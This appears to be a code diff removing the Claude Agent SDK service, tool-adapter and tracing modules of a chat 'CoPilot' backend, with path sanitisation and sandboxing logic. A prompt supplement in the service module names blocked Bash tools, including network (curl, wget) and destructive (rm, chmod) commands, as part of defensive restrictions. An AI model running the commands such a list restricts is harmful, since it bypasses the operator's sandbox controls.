result = _validate_user_isolation(
"find_agent", {"query": "email"}, user_id="user-1"
)
assert result == {}

View File

@@ -1,556 +0,0 @@
"""Claude Agent SDK service layer for CoPilot chat completions."""
import asyncio
import json
import logging
import os
import re
import uuid
from collections.abc import AsyncGenerator
from typing import Any
from backend.util.exceptions import NotFoundError
from ..config import ChatConfig
from ..model import (
ChatMessage,
ChatSession,
Usage,
get_chat_session,
update_session_title,
upsert_chat_session,
)
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamStart,
StreamTextDelta,
StreamToolInputAvailable,
StreamToolOutputAvailable,
StreamUsage,
)
from ..service import _build_system_prompt, _generate_session_title
from ..tracking import track_user_message
from .anthropic_fallback import stream_with_anthropic
from .response_adapter import SDKResponseAdapter
from .security_hooks import create_security_hooks
from .tool_adapter import (
COPILOT_TOOL_NAMES,
create_copilot_mcp_server,
set_execution_context,
)
from .tracing import TracedSession, create_tracing_hooks, merge_hooks
logger = logging.getLogger(__name__)
config = ChatConfig()
# Set to hold background tasks to prevent garbage collection
_background_tasks: set[asyncio.Task[Any]] = set()
_SDK_CWD_PREFIX = "/tmp/copilot-"
# Appended to the system prompt to inform the agent about Bash restrictions.
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
# but it doesn't know about our security hooks' command allowlist for Bash.
_SDK_TOOL_SUPPLEMENT = """
## Bash restrictions
The Bash tool is restricted to safe, read-only data-processing commands:
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
echo, diff, base64, and similar utilities.
Network commands (curl, wget), destructive commands (rm, chmod), and
interpreters (python, node) are NOT available.
"""
def _resolve_sdk_model() -> str | None:
"""Resolve the model name for the Claude Agent SDK CLI.
Uses ``config.claude_agent_model`` if set, otherwise derives from
``config.model`` by stripping the OpenRouter provider prefix (e.g.,
``"anthropic/claude-opus-4.6"`` → ``"claude-opus-4.6"``).
"""
if config.claude_agent_model:
return config.claude_agent_model
model = config.model
if "/" in model:
return model.split("/", 1)[1]
return model
def _build_sdk_env() -> dict[str, str]:
"""Build env vars for the SDK CLI process.
Routes API calls through OpenRouter (or a custom base_url) using
the same ``config.api_key`` / ``config.base_url`` as the non-SDK path.
This gives per-call token and cost tracking on the OpenRouter dashboard.
Only overrides ``ANTHROPIC_API_KEY`` when a valid proxy URL and auth
token are both present — otherwise returns an empty dict so the SDK
falls back to its default credentials.
"""
env: dict[str, str] = {}
if config.api_key and config.base_url:
# Strip /v1 suffix — SDK expects the base URL without a version path
base = config.base_url.rstrip("/")
if base.endswith("/v1"):
base = base[:-3]
if not base or not base.startswith("http"):
# Invalid base_url — don't override SDK defaults
return env
env["ANTHROPIC_BASE_URL"] = base
env["ANTHROPIC_AUTH_TOKEN"] = config.api_key
# Must be explicitly empty so the CLI uses AUTH_TOKEN instead
env["ANTHROPIC_API_KEY"] = ""
return env
def _make_sdk_cwd(session_id: str) -> str:
"""Create a safe, session-specific working directory path.
Sanitizes session_id, then validates the resulting path stays under /tmp/
using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
"""
# Step 1: Sanitize - only allow alphanumeric and hyphens
safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
if not safe_id:
raise ValueError("Session ID is empty after sanitization")
# Step 2: Construct path with known-safe prefix
cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
# Step 3: Validate the path is still under our prefix (prevent traversal)
if not cwd.startswith(_SDK_CWD_PREFIX):
raise ValueError(f"Session path escaped prefix: {cwd}")
# Step 4: Additional assertion for defense-in-depth
assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"
return cwd
def _cleanup_sdk_tool_results(cwd: str) -> None:
"""Remove SDK tool-result files for a specific session working directory.
The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
We clean only the specific cwd's results to avoid race conditions between
concurrent sessions.
Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
"""
import shutil
# Security check 1: Validate cwd is under the expected prefix
normalized = os.path.normpath(cwd)
if not normalized.startswith(_SDK_CWD_PREFIX):
logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
return
# Security check 2: Ensure no path traversal in the normalized path
if ".." in normalized:
logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
return
# SDK encodes the cwd path by replacing '/' with '-'
encoded_cwd = normalized.replace("/", "-")
# Construct the project directory path (known-safe home expansion)
claude_projects = os.path.expanduser("~/.claude/projects")
project_dir = os.path.join(claude_projects, encoded_cwd)
# Security check 3: Validate project_dir is under ~/.claude/projects
project_dir = os.path.normpath(project_dir)
if not project_dir.startswith(claude_projects):
logger.warning(
f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
)
return
results_dir = os.path.join(project_dir, "tool-results")
if os.path.isdir(results_dir):
for filename in os.listdir(results_dir):
file_path = os.path.join(results_dir, filename)
try:
if os.path.isfile(file_path):
os.remove(file_path)
except OSError:
pass
# Also clean up the temp cwd directory itself
try:
shutil.rmtree(normalized, ignore_errors=True)
except OSError:
pass
async def _compress_conversation_history(
session: ChatSession,
) -> list[ChatMessage]:
"""Compress prior conversation messages if they exceed the token threshold.
Uses the shared compress_context() from prompt.py which supports:
- LLM summarization of old messages (keeps recent ones intact)
- Progressive content truncation as fallback
- Middle-out deletion as last resort
Returns the compressed prior messages (everything except the current message).
"""
prior = session.messages[:-1]
if len(prior) < 2:
return prior
from backend.util.prompt import compress_context
# Convert ChatMessages to dicts for compress_context
messages_dict = []
for msg in prior:
msg_dict: dict[str, Any] = {"role": msg.role}
if msg.content:
msg_dict["content"] = msg.content
if msg.tool_calls:
msg_dict["tool_calls"] = msg.tool_calls
if msg.tool_call_id:
msg_dict["tool_call_id"] = msg.tool_call_id
messages_dict.append(msg_dict)
try:
import openai
async with openai.AsyncOpenAI(
api_key=config.api_key, base_url=config.base_url, timeout=30.0
) as client:
result = await compress_context(
messages=messages_dict,
model=config.model,
client=client,
)
except Exception as e:
logger.warning(f"[SDK] Context compression with LLM failed: {e}")
# Fall back to truncation-only (no LLM summarization)
result = await compress_context(
messages=messages_dict,
model=config.model,
client=None,
)
if result.was_compacted:
logger.info(
f"[SDK] Context compacted: {result.original_token_count} -> "
f"{result.token_count} tokens "
f"({result.messages_summarized} summarized, "
f"{result.messages_dropped} dropped)"
)
# Convert compressed dicts back to ChatMessages
return [
ChatMessage(
role=m["role"],
content=m.get("content"),
tool_calls=m.get("tool_calls"),
tool_call_id=m.get("tool_call_id"),
)
for m in result.messages
]
return prior
def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
"""Format conversation messages into a context prefix for the user message.
Returns a string like:
<conversation_history>
User: hello
You responded: Hi! How can I help?
</conversation_history>
Returns None if there are no messages to format.
"""
if not messages:
return None
lines: list[str] = []
for msg in messages:
if not msg.content:
continue
if msg.role == "user":
lines.append(f"User: {msg.content}")
elif msg.role == "assistant":
lines.append(f"You responded: {msg.content}")
# Skip tool messages — they're internal details
if not lines:
return None
return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
async def stream_chat_completion_sdk(
session_id: str,
message: str | None = None,
tool_call_response: str | None = None, # noqa: ARG001
is_user_message: bool = True,
user_id: str | None = None,
retry_count: int = 0, # noqa: ARG001
session: ChatSession | None = None,
context: dict[str, str] | None = None, # noqa: ARG001
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream chat completion using Claude Agent SDK.
Drop-in replacement for stream_chat_completion with improved reliability.
"""
if session is None:
session = await get_chat_session(session_id, user_id)
if not session:
raise NotFoundError(
f"Session {session_id} not found. Please create a new session first."
)
if message:
session.messages.append(
ChatMessage(
role="user" if is_user_message else "assistant", content=message
)
)
if is_user_message:
track_user_message(
user_id=user_id, session_id=session_id, message_length=len(message)
)
session = await upsert_chat_session(session)
# Generate title for new sessions (first user message)
if is_user_message and not session.title:
user_messages = [m for m in session.messages if m.role == "user"]
if len(user_messages) == 1:
first_message = user_messages[0].content or message or ""
if first_message:
task = asyncio.create_task(
_update_title_async(session_id, first_message, user_id)
)
_background_tasks.add(task)
task.add_done_callback(_background_tasks.discard)
# Build system prompt (reuses non-SDK path with Langfuse support)
has_history = len(session.messages) > 1
system_prompt, _ = await _build_system_prompt(
user_id, has_conversation_history=has_history
)
system_prompt += _SDK_TOOL_SUPPLEMENT
message_id = str(uuid.uuid4())
text_block_id = str(uuid.uuid4())
task_id = str(uuid.uuid4())
yield StreamStart(messageId=message_id, taskId=task_id)
stream_completed = False
# Use a session-specific temp dir to avoid cleanup race conditions
# between concurrent sessions.
sdk_cwd = _make_sdk_cwd(session_id)
os.makedirs(sdk_cwd, exist_ok=True)
set_execution_context(user_id, session, None)
try:
try:
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
mcp_server = create_copilot_mcp_server()
sdk_model = _resolve_sdk_model()
# Initialize Langfuse tracing (no-op if not configured)
tracer = TracedSession(session_id, user_id, system_prompt, model=sdk_model)
# Merge security hooks with optional tracing hooks
security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
tracing_hooks = create_tracing_hooks(tracer)
combined_hooks = merge_hooks(security_hooks, tracing_hooks)
options = ClaudeAgentOptions(
system_prompt=system_prompt,
mcp_servers={"copilot": mcp_server}, # type: ignore[arg-type]
allowed_tools=COPILOT_TOOL_NAMES,
hooks=combined_hooks, # type: ignore[arg-type]
cwd=sdk_cwd,
max_buffer_size=config.claude_agent_max_buffer_size,
model=sdk_model,
env=_build_sdk_env(),
user=user_id or None,
max_budget_usd=config.claude_agent_max_budget_usd,
)
adapter = SDKResponseAdapter(message_id=message_id)
adapter.set_task_id(task_id)
async with tracer, ClaudeSDKClient(options=options) as client:
current_message = message or ""
if not current_message and session.messages:
last_user = [m for m in session.messages if m.role == "user"]
if last_user:
current_message = last_user[-1].content or ""
if not current_message.strip():
yield StreamError(
errorText="Message cannot be empty.",
code="empty_prompt",
)
yield StreamFinish()
return
# Build query with conversation history context.
# Compress history first to handle long conversations.
query_message = current_message
if len(session.messages) > 1:
compressed = await _compress_conversation_history(session)
history_context = _format_conversation_context(compressed)
if history_context:
query_message = (
f"{history_context}\n\n"
f"Now, the user says:\n{current_message}"
)
logger.info(
f"[SDK] Sending query: {current_message[:80]!r}"
f" ({len(session.messages)} msgs in session)"
)
tracer.log_user_message(current_message)
await client.query(query_message, session_id=session_id)
assistant_response = ChatMessage(role="assistant", content="")
accumulated_tool_calls: list[dict[str, Any]] = []
has_appended_assistant = False
has_tool_results = False
async for sdk_msg in client.receive_messages():
logger.debug(
f"[SDK] Received: {type(sdk_msg).__name__} "
f"{getattr(sdk_msg, 'subtype', '')}"
)
tracer.log_sdk_message(sdk_msg)
for response in adapter.convert_message(sdk_msg):
if isinstance(response, StreamStart):
continue
yield response
if isinstance(response, StreamTextDelta):
delta = response.delta or ""
# After tool results, start a new assistant
# message for the post-tool text.
if has_tool_results and has_appended_assistant:
assistant_response = ChatMessage(
role="assistant", content=delta
)
accumulated_tool_calls = []
has_appended_assistant = False
has_tool_results = False
session.messages.append(assistant_response)
has_appended_assistant = True
else:
assistant_response.content = (
assistant_response.content or ""
) + delta
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolInputAvailable):
accumulated_tool_calls.append(
{
"id": response.toolCallId,
"type": "function",
"function": {
"name": response.toolName,
"arguments": json.dumps(response.input or {}),
},
}
)
assistant_response.tool_calls = accumulated_tool_calls
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolOutputAvailable):
session.messages.append(
ChatMessage(
role="tool",
content=(
response.output
if isinstance(response.output, str)
else str(response.output)
),
tool_call_id=response.toolCallId,
)
)
has_tool_results = True
elif isinstance(response, StreamUsage):
session.usage.append(
Usage(
prompt_tokens=response.promptTokens,
completion_tokens=response.completionTokens,
total_tokens=response.totalTokens,
)
)
elif isinstance(response, StreamFinish):
stream_completed = True
if stream_completed:
break
if (
assistant_response.content or assistant_response.tool_calls
) and not has_appended_assistant:
session.messages.append(assistant_response)
except ImportError:
logger.warning(
"[SDK] claude-agent-sdk not available, using Anthropic fallback"
)
async for response in stream_with_anthropic(
session, system_prompt, text_block_id
):
if isinstance(response, StreamFinish):
stream_completed = True
yield response
await upsert_chat_session(session)
logger.debug(
f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
)
if not stream_completed:
yield StreamFinish()
except Exception as e:
logger.error(f"[SDK] Error: {e}", exc_info=True)
try:
await upsert_chat_session(session)
except Exception as save_err:
logger.error(f"[SDK] Failed to save session on error: {save_err}")
yield StreamError(
errorText="An error occurred. Please try again.",
code="sdk_error",
)
yield StreamFinish()
finally:
_cleanup_sdk_tool_results(sdk_cwd)
async def _update_title_async(
session_id: str, message: str, user_id: str | None = None
) -> None:
"""Background task to update session title."""
try:
title = await _generate_session_title(
message, user_id=user_id, session_id=session_id
)
if title:
await update_session_title(session_id, title)
logger.debug(f"[SDK] Generated title for {session_id}: {title}")
except Exception as e:
logger.warning(f"[SDK] Failed to update session title: {e}")

View File

@@ -1,321 +0,0 @@
"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
This module provides the adapter layer that converts existing BaseTool implementations
into in-process MCP tools that can be used with the Claude Agent SDK.
"""
import json
import logging
import os
import uuid
from contextvars import ContextVar
from typing import Any
from backend.api.features.chat.model import ChatSession
from backend.api.features.chat.tools import TOOL_REGISTRY
from backend.api.features.chat.tools.base import BaseTool
logger = logging.getLogger(__name__)
# Allowed base directory for the Read tool (SDK saves oversized tool results here)
_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
MCP_SERVER_NAME = "copilot"
MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
# Context variables to pass user/session info to tool execution
_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
_current_session: ContextVar[ChatSession | None] = ContextVar(
"current_session", default=None
)
_current_tool_call_id: ContextVar[str | None] = ContextVar(
"current_tool_call_id", default=None
)
# Stash for MCP tool outputs before the SDK potentially truncates them.
# Keyed by tool_name → full output string. Consumed (popped) by the
# response adapter when it builds StreamToolOutputAvailable.
_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
"pending_tool_outputs", default=None # type: ignore[arg-type]
)
def set_execution_context(
user_id: str | None,
session: ChatSession,
tool_call_id: str | None = None,
) -> None:
"""Set the execution context for tool calls.
This must be called before streaming begins to ensure tools have access
to user_id and session information.
"""
_current_user_id.set(user_id)
_current_session.set(session)
_current_tool_call_id.set(tool_call_id)
_pending_tool_outputs.set({})
def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
"""Get the current execution context."""
return (
_current_user_id.get(),
_current_session.get(),
_current_tool_call_id.get(),
)
def pop_pending_tool_output(tool_name: str) -> str | None:
"""Pop and return the stashed full output for *tool_name*.
The SDK CLI may truncate large tool results (writing them to disk and
replacing the content with a file reference). This stash keeps the
original MCP output so the response adapter can forward it to the
frontend for proper widget rendering.
Returns ``None`` if nothing was stashed for *tool_name*.
"""
pending = _pending_tool_outputs.get(None)
if pending is None:
return None
return pending.pop(tool_name, None)
def create_tool_handler(base_tool: BaseTool):
"""Create an async handler function for a BaseTool.
This wraps the existing BaseTool._execute method to be compatible
with the Claude Agent SDK MCP tool format.
"""
async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Execute the wrapped tool and return MCP-formatted response."""
user_id, session, tool_call_id = get_execution_context()
if session is None:
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": "No session context available",
"type": "error",
}
),
}
],
"isError": True,
}
try:
# Call the existing tool's execute method
# Generate unique tool_call_id per invocation for proper correlation
effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
result = await base_tool.execute(
user_id=user_id,
session=session,
tool_call_id=effective_id,
**args,
)
# The result is a StreamToolOutputAvailable, extract the output
text = (
result.output
if isinstance(result.output, str)
else json.dumps(result.output)
)
# Stash the full output before the SDK potentially truncates it.
# The response adapter will pop this for frontend widget rendering.
pending = _pending_tool_outputs.get(None)
if pending is not None:
pending[base_tool.name] = text
return {
"content": [{"type": "text", "text": text}],
"isError": not result.success,
}
except Exception as e:
logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": str(e),
"type": "error",
"message": f"Failed to execute {base_tool.name}",
}
),
}
],
"isError": True,
}
return tool_handler
def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
"""Build a JSON Schema input schema for a tool."""
return {
"type": "object",
"properties": base_tool.parameters.get("properties", {}),
"required": base_tool.parameters.get("required", []),
}
def get_tool_definitions() -> list[dict[str, Any]]:
"""Get all tool definitions in MCP format.
Returns a list of tool definitions that can be used with
create_sdk_mcp_server or as raw tool definitions.
"""
tool_definitions = []
for tool_name, base_tool in TOOL_REGISTRY.items():
tool_def = {
"name": tool_name,
"description": base_tool.description,
"inputSchema": _build_input_schema(base_tool),
}
tool_definitions.append(tool_def)
return tool_definitions
def get_tool_handlers() -> dict[str, Any]:
"""Get all tool handlers mapped by name.
Returns a dictionary mapping tool names to their handler functions.
"""
handlers = {}
for tool_name, base_tool in TOOL_REGISTRY.items():
handlers[tool_name] = create_tool_handler(base_tool)
return handlers
async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Read a file with optional offset/limit. Restricted to SDK working directory.
After reading, the file is deleted to prevent accumulation in long-running pods.
"""
file_path = args.get("file_path", "")
offset = args.get("offset", 0)
limit = args.get("limit", 2000)
# Security: only allow reads under the SDK's working directory
real_path = os.path.realpath(file_path)
if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
return {
"content": [{"type": "text", "text": f"Access denied: {file_path}"}],
"isError": True,
}
try:
with open(real_path) as f:
lines = f.readlines()
selected = lines[offset : offset + limit]
content = "".join(selected)
return {"content": [{"type": "text", "text": content}], "isError": False}
except FileNotFoundError:
return {
"content": [{"type": "text", "text": f"File not found: {file_path}"}],
"isError": True,
}
except Exception as e:
return {
"content": [{"type": "text", "text": f"Error reading file: {e}"}],
"isError": True,
}
_READ_TOOL_NAME = "Read"
_READ_TOOL_DESCRIPTION = (
"Read a file from the local filesystem. "
"Use offset and limit to read specific line ranges for large files."
)
_READ_TOOL_SCHEMA = {
"type": "object",
"properties": {
"file_path": {
"type": "string",
"description": "The absolute path to the file to read",
},
"offset": {
"type": "integer",
"description": "Line number to start reading from (0-indexed). Default: 0",
},
"limit": {
"type": "integer",
"description": "Number of lines to read. Default: 2000",
},
},
"required": ["file_path"],
}
# Create the MCP server configuration
def create_copilot_mcp_server():
"""Create an in-process MCP server configuration for CoPilot tools.
This can be passed to ClaudeAgentOptions.mcp_servers.
Note: The actual SDK MCP server creation depends on the claude-agent-sdk
package being available. This function returns the configuration that
can be used with the SDK.
"""
try:
from claude_agent_sdk import create_sdk_mcp_server, tool
# Create decorated tool functions
sdk_tools = []
for tool_name, base_tool in TOOL_REGISTRY.items():
handler = create_tool_handler(base_tool)
decorated = tool(
tool_name,
base_tool.description,
_build_input_schema(base_tool),
)(handler)
sdk_tools.append(decorated)
# Add the Read tool so the SDK can read back oversized tool results
read_tool = tool(
_READ_TOOL_NAME,
_READ_TOOL_DESCRIPTION,
_READ_TOOL_SCHEMA,
)(_read_file_handler)
sdk_tools.append(read_tool)
server = create_sdk_mcp_server(
name=MCP_SERVER_NAME,
version="1.0.0",
tools=sdk_tools,
)
return server
except ImportError:
# Let ImportError propagate so service.py handles the fallback
raise
# SDK built-in tools allowed within the workspace directory.
# Security hooks validate that file paths stay within sdk_cwd
# and that Bash commands are restricted to a safe allowlist.
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
# List of tool names for allowed_tools configuration
# Include MCP tools, the MCP Read tool for oversized results,
# and SDK built-in file tools for workspace operations.
COPILOT_TOOL_NAMES = [
*[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
*_SDK_BUILTIN_TOOLS,
]

View File

@@ -1,429 +0,0 @@
"""Langfuse tracing integration for Claude Agent SDK.
This module provides modular, non-invasive observability for SDK sessions.
All tracing is opt-in (only active when Langfuse credentials are configured)
and designed to not affect the core execution flow.
Usage:
async with TracedSession(session_id, user_id) as tracer:
# Your SDK code here
tracer.log_user_message(message)
async for sdk_msg in client.receive_messages():
tracer.log_sdk_message(sdk_msg)
tracer.log_result(result_message)
"""
from __future__ import annotations
import logging
import time
from contextlib import asynccontextmanager
from dataclasses import dataclass, field
from typing import TYPE_CHECKING, Any
from backend.util.settings import Settings
if TYPE_CHECKING:
from claude_agent_sdk import Message, ResultMessage
logger = logging.getLogger(__name__)
settings = Settings()
def _is_langfuse_configured() -> bool:
"""Check if Langfuse credentials are configured."""
return bool(
settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
)
@dataclass
class ToolSpan:
"""Tracks a single tool call for tracing."""
tool_call_id: str
tool_name: str
input: dict[str, Any]
start_time: float = field(default_factory=time.perf_counter)
output: str | None = None
success: bool = True
end_time: float | None = None
@dataclass
class GenerationSpan:
"""Tracks an LLM generation (text output) for tracing."""
text: str = ""
start_time: float = field(default_factory=time.perf_counter)
end_time: float | None = None
tool_calls: list[ToolSpan] = field(default_factory=list)
class TracedSession:
"""Context manager for tracing a Claude Agent SDK session with Langfuse.
Automatically creates a trace with:
- Session-level metadata (user_id, session_id)
- Generation spans for LLM outputs
- Tool call spans with input/output
- Token usage and cost (from ResultMessage)
If Langfuse is not configured, all methods are no-ops.
"""
def __init__(
self,
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
model: str | None = None,
):
self.session_id = session_id
self.user_id = user_id
self.system_prompt = system_prompt
self.model = model
self.enabled = _is_langfuse_configured()
# Internal state
self._trace: Any = None
self._langfuse: Any = None
self._user_message: str | None = None
self._generations: list[GenerationSpan] = []
self._current_generation: GenerationSpan | None = None
self._pending_tools: dict[str, ToolSpan] = {}
self._start_time: float = 0
async def __aenter__(self) -> TracedSession:
"""Start the trace."""
if not self.enabled:
return self
try:
from langfuse import get_client
self._langfuse = get_client()
self._start_time = time.perf_counter()
# Create the root trace
self._trace = self._langfuse.trace(
name="copilot-sdk-session",
session_id=self.session_id,
user_id=self.user_id,
metadata={
"sdk": "claude-agent-sdk",
"has_system_prompt": bool(self.system_prompt),
},
)
logger.debug(f"[Tracing] Started trace for session {self.session_id}")
except Exception as e:
logger.warning(f"[Tracing] Failed to start trace: {e}")
self.enabled = False
return self
async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
"""End the trace and flush to Langfuse."""
if not self.enabled or not self._trace:
return
try:
# Finalize any open generation
self._finalize_current_generation()
# Add generations as spans
for gen in self._generations:
self._trace.span(
name="llm-generation",
start_time=gen.start_time,
end_time=gen.end_time or time.perf_counter(),
output=gen.text[:1000] if gen.text else None, # Truncate
metadata={"tool_calls": len(gen.tool_calls)},
)
# Add tool calls as nested spans
for tool in gen.tool_calls:
self._trace.span(
name=f"tool:{tool.tool_name}",
start_time=tool.start_time,
end_time=tool.end_time or time.perf_counter(),
input=tool.input,
output=tool.output[:500] if tool.output else None,
metadata={
"tool_call_id": tool.tool_call_id,
"success": tool.success,
},
)
# Update trace with final status
status = "error" if exc_type else "success"
self._trace.update(
output=self._generations[-1].text[:500] if self._generations else None,
metadata={"status": status, "num_generations": len(self._generations)},
)
# Flush asynchronously (Langfuse handles this in background)
logger.debug(
f"[Tracing] Completed trace for session {self.session_id}, "
f"{len(self._generations)} generations"
)
except Exception as e:
logger.warning(f"[Tracing] Failed to finalize trace: {e}")
def log_user_message(self, message: str) -> None:
"""Log the user's input message."""
if not self.enabled or not self._trace:
return
self._user_message = message
try:
self._trace.update(input=message[:1000])
except Exception as e:
logger.debug(f"[Tracing] Failed to log user message: {e}")
def log_sdk_message(self, sdk_message: Message) -> None:
"""Log an SDK message (automatically categorizes by type)."""
if not self.enabled:
return
try:
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
if isinstance(sdk_message, AssistantMessage):
# Start a new generation if needed
if self._current_generation is None:
self._current_generation = GenerationSpan()
self._generations.append(self._current_generation)
for block in sdk_message.content:
if isinstance(block, TextBlock) and block.text:
self._current_generation.text += block.text
elif isinstance(block, ToolUseBlock):
tool_span = ToolSpan(
tool_call_id=block.id,
tool_name=block.name,
input=block.input or {},
)
self._pending_tools[block.id] = tool_span
if self._current_generation:
self._current_generation.tool_calls.append(tool_span)
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_span = self._pending_tools.get(block.tool_use_id)
if tool_span:
tool_span.end_time = time.perf_counter()
tool_span.success = not (block.is_error or False)
tool_span.output = self._extract_tool_output(block.content)
# After tool results, finalize current generation
# (SDK will start a new AssistantMessage for continuation)
self._finalize_current_generation()
elif isinstance(sdk_message, ResultMessage):
self._log_result(sdk_message)
except Exception as e:
logger.debug(f"[Tracing] Failed to log SDK message: {e}")
def _log_result(self, result: ResultMessage) -> None:
"""Log the final result with usage and cost."""
if not self.enabled or not self._trace:
return
try:
# Extract usage info
usage = result.usage or {}
metadata: dict[str, Any] = {
"duration_ms": result.duration_ms,
"duration_api_ms": result.duration_api_ms,
"num_turns": result.num_turns,
"is_error": result.is_error,
}
if result.total_cost_usd is not None:
metadata["cost_usd"] = result.total_cost_usd
if usage:
metadata["usage"] = usage
self._trace.update(metadata=metadata)
# Log as a generation for proper Langfuse cost/usage tracking
if usage or result.total_cost_usd:
self._trace.generation(
name="claude-sdk-completion",
model=self.model or "claude-sonnet-4-20250514",
usage=(
{
"input": usage.get("input_tokens", 0),
"output": usage.get("output_tokens", 0),
"total": usage.get("input_tokens", 0)
+ usage.get("output_tokens", 0),
}
if usage
else None
),
metadata={"cost_usd": result.total_cost_usd},
)
logger.debug(
f"[Tracing] Logged result: {result.num_turns} turns, "
f"${result.total_cost_usd:.4f} cost"
if result.total_cost_usd
else f"[Tracing] Logged result: {result.num_turns} turns"
)
except Exception as e:
logger.debug(f"[Tracing] Failed to log result: {e}")
def _finalize_current_generation(self) -> None:
"""Mark the current generation as complete."""
if self._current_generation:
self._current_generation.end_time = time.perf_counter()
self._current_generation = None
@staticmethod
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract string output from tool result content."""
if isinstance(content, str):
return content
if isinstance(content, list):
parts = [
item.get("text", "") for item in content if item.get("type") == "text"
]
return "".join(parts) if parts else str(content)
return str(content) if content else ""
@asynccontextmanager
async def traced_session(
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
model: str | None = None,
):
"""Convenience async context manager for tracing SDK sessions.
Usage:
async with traced_session(session_id, user_id) as tracer:
tracer.log_user_message(message)
async for msg in client.receive_messages():
tracer.log_sdk_message(msg)
"""
tracer = TracedSession(session_id, user_id, system_prompt, model=model)
async with tracer:
yield tracer
def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
"""Create SDK hooks for fine-grained Langfuse tracing.
These hooks capture precise timing for tool executions and failures
that may not be visible in the message stream.
Designed to be merged with security hooks:
hooks = {**security_hooks, **create_tracing_hooks(tracer)}
Args:
tracer: The active TracedSession instance
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
if not tracer.enabled:
return {}
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def trace_pre_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool start time for accurate duration tracking."""
_ = context
if not tool_use_id:
return {}
tool_name = str(input_data.get("tool_name", "unknown"))
tool_input = input_data.get("tool_input", {})
# Record start time in pending tools
tracer._pending_tools[tool_use_id] = ToolSpan(
tool_call_id=tool_use_id,
tool_name=tool_name,
input=tool_input if isinstance(tool_input, dict) else {},
)
return {}
async def trace_post_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool completion for duration calculation."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = True
return {}
async def trace_post_tool_failure(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool failures for error tracking."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = False
error = input_data.get("error", "Unknown error")
tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
return {}
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
],
}
except ImportError:
logger.debug("[Tracing] SDK not available for hook-based tracing")
return {}
def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
"""Merge multiple hook configurations into one.
Combines hook matchers for the same event type, allowing both
security and tracing hooks to coexist.
Usage:
combined = merge_hooks(security_hooks, tracing_hooks)
"""
result: dict[str, list[Any]] = {}
for hook_dict in hook_dicts:
for event_name, matchers in hook_dict.items():
if event_name not in result:
result[event_name] = []
result[event_name].extend(matchers)
return result

View File

@@ -52,10 +52,8 @@ from .response_model import (
StreamBaseResponse,
StreamError,
